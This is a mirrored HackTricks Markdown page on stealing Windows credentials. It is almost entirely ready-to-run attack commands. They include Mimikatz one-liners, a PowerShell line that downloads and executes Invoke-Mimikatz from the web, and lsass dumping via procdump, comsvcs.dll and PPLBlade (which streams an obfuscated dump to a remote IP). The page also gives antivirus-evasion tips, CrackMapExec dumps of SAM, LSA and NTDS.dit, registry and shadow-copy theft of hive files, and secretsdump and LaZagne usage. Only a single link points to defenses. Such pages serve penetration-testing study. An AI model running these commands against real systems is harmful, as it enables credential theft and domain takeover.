mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-24 03:53:29 +00:00
357 lines
16 KiB
Markdown
357 lines
16 KiB
Markdown
|
# Stealing Windows Credentials
|
||
|
|
||
|
{% hint style="success" %}
|
||
|
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||
|
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||
|
|
||
|
<details>
|
||
|
|
||
|
<summary>Support HackTricks</summary>
|
||
|
|
||
|
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
||
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||
|
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||
|
|
||
|
</details>
|
||
|
{% endhint %}
|
||
|
|
||
|
## Credentials Mimikatz
|
||
|
|
||
|
```bash
|
||
|
#Elevate Privileges to extract the credentials
|
||
|
privilege::debug #This should give am error if you are Admin, butif it does, check if the SeDebugPrivilege was removed from Admins
|
||
|
token::elevate
|
||
|
#Extract from lsass (memory)
|
||
|
sekurlsa::logonpasswords
|
||
|
#Extract from lsass (service)
|
||
|
lsadump::lsa /inject
|
||
|
#Extract from SAM
|
||
|
lsadump::sam
|
||
|
#One liner
|
||
|
mimikatz "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::lsa /inject" "lsadump::sam" "lsadump::cache" "sekurlsa::ekeys" "exit"
|
||
|
```
|
||
|
|
||
|
**Find other things that Mimikatz can do in** [**this page**](credentials-mimikatz.md)**.**
|
||
|
|
||
|
### Invoke-Mimikatz
|
||
|
|
||
|
```bash
|
||
|
IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1')
|
||
|
Invoke-Mimikatz -DumpCreds #Dump creds from memory
|
||
|
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::lsa /inject" "lsadump::sam" "lsadump::cache" "sekurlsa::ekeys" "exit"'
|
||
|
```
|
||
|
|
||
|
[**Learn about some possible credentials protections here.**](credentials-protections.md) **This protections could prevent Mimikatz from extracting some credentials.**
|
||
|
|
||
|
## Credentials with Meterpreter
|
||
|
|
||
|
Use the [**Credentials Plugin**](https://github.com/carlospolop/MSF-Credentials) **that** I have created to **search for passwords and hashes** inside the victim.
|
||
|
|
||
|
```bash
|
||
|
#Credentials from SAM
|
||
|
post/windows/gather/smart_hashdump
|
||
|
hashdump
|
||
|
|
||
|
#Using kiwi module
|
||
|
load kiwi
|
||
|
creds_all
|
||
|
kiwi_cmd "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::lsa /inject" "lsadump::sam"
|
||
|
|
||
|
#Using Mimikatz module
|
||
|
load mimikatz
|
||
|
mimikatz_command -f "sekurlsa::logonpasswords"
|
||
|
mimikatz_command -f "lsadump::lsa /inject"
|
||
|
mimikatz_command -f "lsadump::sam"
|
||
|
```
|
||
|
|
||
|
## Bypassing AV
|
||
|
|
||
|
### Procdump + Mimikatz
|
||
|
|
||
|
As **Procdump from** [**SysInternals** ](https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite)**is a legitimate Microsoft tool**, it's not detected by Defender.\
|
||
|
You can use this tool to **dump the lsass process**, **download the dump** and **extract** the **credentials locally** from the dump.
|
||
|
|
||
|
{% code title="Dump lsass" %}
|
||
|
```bash
|
||
|
#Local
|
||
|
C:\procdump.exe -accepteula -ma lsass.exe lsass.dmp
|
||
|
#Remote, mount https://live.sysinternals.com which contains procdump.exe
|
||
|
net use Z: https://live.sysinternals.com
|
||
|
Z:\procdump.exe -accepteula -ma lsass.exe lsass.dmp
|
||
|
```
|
||
|
{% endcode %}
|
||
|
|
||
|
{% code title="Extract credentials from the dump" %}
|
||
|
```c
|
||
|
//Load the dump
|
||
|
mimikatz # sekurlsa::minidump lsass.dmp
|
||
|
//Extract credentials
|
||
|
mimikatz # sekurlsa::logonPasswords
|
||
|
```
|
||
|
{% endcode %}
|
||
|
|
||
|
This process is done automatically with [SprayKatz](https://github.com/aas-n/spraykatz): `./spraykatz.py -u H4x0r -p L0c4L4dm1n -t 192.168.1.0/24`
|
||
|
|
||
|
**Note**: Some **AV** may **detect** as **malicious** the use of **procdump.exe to dump lsass.exe**, this is because they are **detecting** the string **"procdump.exe" and "lsass.exe"**. So it is **stealthier** to **pass** as an **argument** the **PID** of lsass.exe to procdump **instead o**f the **name lsass.exe.**
|
||
|
|
||
|
### Dumping lsass with **comsvcs.dll**
|
||
|
|
||
|
A DLL named **comsvcs.dll** found in `C:\Windows\System32` is responsible for **dumping process memory** in the event of a crash. This DLL includes a **function** named **`MiniDumpW`**, designed to be invoked using `rundll32.exe`.\
|
||
|
It is irrelevant to use the first two arguments, but the third one is divided into three components. The process ID to be dumped constitutes the first component, the dump file location represents the second, and the third component is strictly the word **full**. No alternative options exist.\
|
||
|
Upon parsing these three components, the DLL is engaged in creating the dump file and transferring the specified process's memory into this file.\
|
||
|
Utilization of the **comsvcs.dll** is feasible for dumping the lsass process, thereby eliminating the need to upload and execute procdump. This method is described in detail at [https://en.hackndo.com/remote-lsass-dump-passwords/](https://en.hackndo.com/remote-lsass-dump-passwords).
|
||
|
|
||
|
The following command is employed for execution:
|
||
|
|
||
|
```bash
|
||
|
rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump <lsass pid> lsass.dmp full
|
||
|
```
|
||
|
|
||
|
**You can automate this process with** [**lssasy**](https://github.com/Hackndo/lsassy)**.**
|
||
|
|
||
|
### **Dumping lsass with Task Manager**
|
||
|
|
||
|
1. Right click on the Task Bar and click on Task Manager
|
||
|
2. Click on More details
|
||
|
3. Search for "Local Security Authority Process" process in the Processes tab
|
||
|
4. Right click on "Local Security Authority Process" process and click on "Create dump file".
|
||
|
|
||
|
### Dumping lsass with procdump
|
||
|
|
||
|
[Procdump](https://docs.microsoft.com/en-us/sysinternals/downloads/procdump) is a Microsoft signed binary which is a part of [sysinternals](https://docs.microsoft.com/en-us/sysinternals/) suite.
|
||
|
|
||
|
```
|
||
|
Get-Process -Name LSASS
|
||
|
.\procdump.exe -ma 608 lsass.dmp
|
||
|
```
|
||
|
|
||
|
## Dumpin lsass with PPLBlade
|
||
|
|
||
|
[**PPLBlade**](https://github.com/tastypepperoni/PPLBlade) is a Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.
|
||
|
|
||
|
**Key functionalities**:
|
||
|
|
||
|
1. Bypassing PPL protection
|
||
|
2. Obfuscating memory dump files to evade Defender signature-based detection mechanisms
|
||
|
3. Uploading memory dump with RAW and SMB upload methods without dropping it onto the disk (fileless dump)
|
||
|
|
||
|
{% code overflow="wrap" %}
|
||
|
```bash
|
||
|
PPLBlade.exe --mode dump --name lsass.exe --handle procexp --obfuscate --dumpmode network --network raw --ip 192.168.1.17 --port 1234
|
||
|
```
|
||
|
{% endcode %}
|
||
|
|
||
|
## CrackMapExec
|
||
|
|
||
|
### Dump SAM hashes
|
||
|
|
||
|
```
|
||
|
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --sam
|
||
|
```
|
||
|
|
||
|
### Dump LSA secrets
|
||
|
|
||
|
```
|
||
|
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --lsa
|
||
|
```
|
||
|
|
||
|
### Dump the NTDS.dit from target DC
|
||
|
|
||
|
```
|
||
|
cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds
|
||
|
#~ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds vss
|
||
|
```
|
||
|
|
||
|
### Dump the NTDS.dit password history from target DC
|
||
|
|
||
|
```
|
||
|
#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --ntds-history
|
||
|
```
|
||
|
|
||
|
### Show the pwdLastSet attribute for each NTDS.dit account
|
||
|
|
||
|
```
|
||
|
#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --ntds-pwdLastSet
|
||
|
```
|
||
|
|
||
|
## Stealing SAM & SYSTEM
|
||
|
|
||
|
This files should be **located** in _C:\windows\system32\config\SAM_ and _C:\windows\system32\config\SYSTEM._ But **you cannot just copy them in a regular way** because they protected.
|
||
|
|
||
|
### From Registry
|
||
|
|
||
|
The easiest way to steal those files is to get a copy from the registry:
|
||
|
|
||
|
```
|
||
|
reg save HKLM\sam sam
|
||
|
reg save HKLM\system system
|
||
|
reg save HKLM\security security
|
||
|
```
|
||
|
|
||
|
**Download** those files to your Kali machine and **extract the hashes** using:
|
||
|
|
||
|
```
|
||
|
samdump2 SYSTEM SAM
|
||
|
impacket-secretsdump -sam sam -security security -system system LOCAL
|
||
|
```
|
||
|
|
||
|
### Volume Shadow Copy
|
||
|
|
||
|
You can perform copy of protected files using this service. You need to be Administrator.
|
||
|
|
||
|
#### Using vssadmin
|
||
|
|
||
|
vssadmin binary is only available in Windows Server versions
|
||
|
|
||
|
```bash
|
||
|
vssadmin create shadow /for=C:
|
||
|
#Copy SAM
|
||
|
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy8\windows\system32\config\SAM C:\Extracted\SAM
|
||
|
#Copy SYSTEM
|
||
|
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy8\windows\system32\config\SYSTEM C:\Extracted\SYSTEM
|
||
|
#Copy ntds.dit
|
||
|
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy8\windows\ntds\ntds.dit C:\Extracted\ntds.dit
|
||
|
|
||
|
# You can also create a symlink to the shadow copy and access it
|
||
|
mklink /d c:\shadowcopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\
|
||
|
```
|
||
|
|
||
|
But you can do the same from **Powershell**. This is an example of **how to copy the SAM file** (the hard drive used is "C:" and its saved to C:\users\Public) but you can use this for copying any protected file:
|
||
|
|
||
|
```bash
|
||
|
$service=(Get-Service -name VSS)
|
||
|
if($service.Status -ne "Running"){$notrunning=1;$service.Start()}
|
||
|
$id=(gwmi -list win32_shadowcopy).Create("C:\","ClientAccessible").ShadowID
|
||
|
$volume=(gwmi win32_shadowcopy -filter "ID='$id'")
|
||
|
cmd /c copy "$($volume.DeviceObject)\windows\system32\config\sam" C:\Users\Public
|
||
|
$voume.Delete();if($notrunning -eq 1){$service.Stop()}
|
||
|
```
|
||
|
|
||
|
Code from the book: [https://0xword.com/es/libros/99-hacking-windows-ataques-a-sistemas-y-redes-microsoft.html](https://0xword.com/es/libros/99-hacking-windows-ataques-a-sistemas-y-redes-microsoft.html)
|
||
|
|
||
|
### Invoke-NinjaCopy
|
||
|
|
||
|
Finally, you could also use the [**PS script Invoke-NinjaCopy**](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-NinjaCopy.ps1) to make a copy of SAM, SYSTEM and ntds.dit.
|
||
|
|
||
|
```bash
|
||
|
Invoke-NinjaCopy.ps1 -Path "C:\Windows\System32\config\sam" -LocalDestination "c:\copy_of_local_sam"
|
||
|
```
|
||
|
|
||
|
## **Active Directory Credentials - NTDS.dit**
|
||
|
|
||
|
The **NTDS.dit** file is known as the heart of **Active Directory**, holding crucial data about user objects, groups, and their memberships. It's where the **password hashes** for domain users are stored. This file is an **Extensible Storage Engine (ESE)** database and resides at **_%SystemRoom%/NTDS/ntds.dit_**.
|
||
|
|
||
|
Within this database, three primary tables are maintained:
|
||
|
|
||
|
- **Data Table**: This table is tasked with storing details about objects like users and groups.
|
||
|
- **Link Table**: It keeps track of relationships, such as group memberships.
|
||
|
- **SD Table**: **Security descriptors** for each object are held here, ensuring the security and access control for the stored objects.
|
||
|
|
||
|
More information about this: [http://blogs.chrisse.se/2012/02/11/how-the-active-directory-data-store-really-works-inside-ntds-dit-part-1/](http://blogs.chrisse.se/2012/02/11/how-the-active-directory-data-store-really-works-inside-ntds-dit-part-1/)
|
||
|
|
||
|
Windows uses _Ntdsa.dll_ to interact with that file and its used by _lsass.exe_. Then, **part** of the **NTDS.dit** file could be located **inside the `lsass`** memory (you can find the latest accessed data probably because of the performance improve by using a **cache**).
|
||
|
|
||
|
#### Decrypting the hashes inside NTDS.dit
|
||
|
|
||
|
The hash is cyphered 3 times:
|
||
|
|
||
|
1. Decrypt Password Encryption Key (**PEK**) using the **BOOTKEY** and **RC4**.
|
||
|
2. Decrypt tha **hash** using **PEK** and **RC4**.
|
||
|
3. Decrypt the **hash** using **DES**.
|
||
|
|
||
|
**PEK** have the **same value** in **every domain controller**, but it is **cyphered** inside the **NTDS.dit** file using the **BOOTKEY** of the **SYSTEM file of the domain controller (is different between domain controllers)**. This is why to get the credentials from the NTDS.dit file **you need the files NTDS.dit and SYSTEM** (_C:\Windows\System32\config\SYSTEM_).
|
||
|
|
||
|
### Copying NTDS.dit using Ntdsutil
|
||
|
|
||
|
Available since Windows Server 2008.
|
||
|
|
||
|
```bash
|
||
|
ntdsutil "ac i ntds" "ifm" "create full c:\copy-ntds" quit quit
|
||
|
```
|
||
|
|
||
|
You could also use the [**volume shadow copy**](./#stealing-sam-and-system) trick to copy the **ntds.dit** file. Remember that you will also need a copy of the **SYSTEM file** (again, [**dump it from the registry or use the volume shadow copy**](./#stealing-sam-and-system) trick).
|
||
|
|
||
|
### **Extracting hashes from NTDS.dit**
|
||
|
|
||
|
Once you have **obtained** the files **NTDS.dit** and **SYSTEM** you can use tools like _secretsdump.py_ to **extract the hashes**:
|
||
|
|
||
|
```bash
|
||
|
secretsdump.py LOCAL -ntds ntds.dit -system SYSTEM -outputfile credentials.txt
|
||
|
```
|
||
|
|
||
|
You can also **extract them automatically** using a valid domain admin user:
|
||
|
|
||
|
```
|
||
|
secretsdump.py -just-dc-ntlm <DOMAIN>/<USER>@<DOMAIN_CONTROLLER>
|
||
|
```
|
||
|
|
||
|
For **big NTDS.dit files** it's recommend to extract it using [gosecretsdump](https://github.com/c-sto/gosecretsdump).
|
||
|
|
||
|
Finally, you can also use the **metasploit module**: _post/windows/gather/credentials/domain\_hashdump_ or **mimikatz** `lsadump::lsa /inject`
|
||
|
|
||
|
### **Extracting domain objects from NTDS.dit to an SQLite database**
|
||
|
|
||
|
NTDS objects can be extracted to an SQLite database with [ntdsdotsqlite](https://github.com/almandin/ntdsdotsqlite). Not only secrets are extracted but also the entire objects and their attributes for further information extraction when the raw NTDS.dit file is already retrieved.
|
||
|
|
||
|
```
|
||
|
ntdsdotsqlite ntds.dit -o ntds.sqlite --system SYSTEM.hive
|
||
|
```
|
||
|
|
||
|
The `SYSTEM` hive is optional but allow for secrets decryption (NT & LM hashes, supplemental credentials such as cleartext passwords, kerberos or trust keys, NT & LM password histories). Along with other information, the following data is extracted : user and machine accounts with their hashes, UAC flags, timestamp for last logon and password change, accounts description, names, UPN, SPN, groups and recursive memberships, organizational units tree and membership, trusted domains with trusts type, direction and attributes...
|
||
|
|
||
|
## Lazagne
|
||
|
|
||
|
Download the binary from [here](https://github.com/AlessandroZ/LaZagne/releases). you can use this binary to extract credentials from several software.
|
||
|
|
||
|
```
|
||
|
lazagne.exe all
|
||
|
```
|
||
|
|
||
|
## Other tools for extracting credentials from SAM and LSASS
|
||
|
|
||
|
### Windows credentials Editor (WCE)
|
||
|
|
||
|
This tool can be used to extract credentials from the memory. Download it from: [http://www.ampliasecurity.com/research/windows-credentials-editor/](https://www.ampliasecurity.com/research/windows-credentials-editor/)
|
||
|
|
||
|
### fgdump
|
||
|
|
||
|
Extract credentials from the SAM file
|
||
|
|
||
|
```
|
||
|
You can find this binary inside Kali, just do: locate fgdump.exe
|
||
|
fgdump.exe
|
||
|
```
|
||
|
|
||
|
### PwDump
|
||
|
|
||
|
Extract credentials from the SAM file
|
||
|
|
||
|
```
|
||
|
You can find this binary inside Kali, just do: locate pwdump.exe
|
||
|
PwDump.exe -o outpwdump -x 127.0.0.1
|
||
|
type outpwdump
|
||
|
```
|
||
|
|
||
|
### PwDump7
|
||
|
|
||
|
Download it from:[ http://www.tarasco.org/security/pwdump\_7](http://www.tarasco.org/security/pwdump\_7) and just **execute it** and the passwords will be extracted.
|
||
|
|
||
|
## Defenses
|
||
|
|
||
|
[**Learn about some credentials protections here.**](credentials-protections.md)
|
||
|
|
||
|
{% hint style="success" %}
|
||
|
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||
|
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||
|
|
||
|
<details>
|
||
|
|
||
|
<summary>Support HackTricks</summary>
|
||
|
|
||
|
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
||
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||
|
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||
|
|
||
|
</details>
|
||
|
{% endhint %}
|